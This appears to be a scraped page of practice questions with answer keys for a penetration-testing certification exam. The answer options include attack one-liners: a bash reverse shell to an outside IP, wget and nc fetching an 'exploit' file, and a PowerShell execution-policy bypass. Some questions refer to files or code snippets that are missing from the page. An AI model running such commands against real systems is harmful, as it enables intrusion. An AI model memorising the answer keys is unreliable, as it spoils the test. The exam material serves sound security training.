CompTIA PT0-002 - CompTIA PenTest+ Certification Exam Exam

Question #6 (Topic: Single Topic)
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through
this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback. B. Download .pl files and look for usernames and passwords. C. Edit the smb.conf file and upload it to the server. D. Download the smb.conf file and look at configurations.
Answer: C
Question #7 (Topic: Single Topic)
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the clientג€™s employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC
Answer: A
Question #8 (Topic: Single Topic)
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit D. wget 10.10.51.50:9891/exploit
Answer: D
Question #9 (Topic: Single Topic)
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM ג€apacheג€ /F
Answer: B
Question #10 (Topic: Single Topic)
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as
the intended audience?
A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe typecasting operations
Answer: D
Download Exam
Page: 2 / 106
Total 530 questions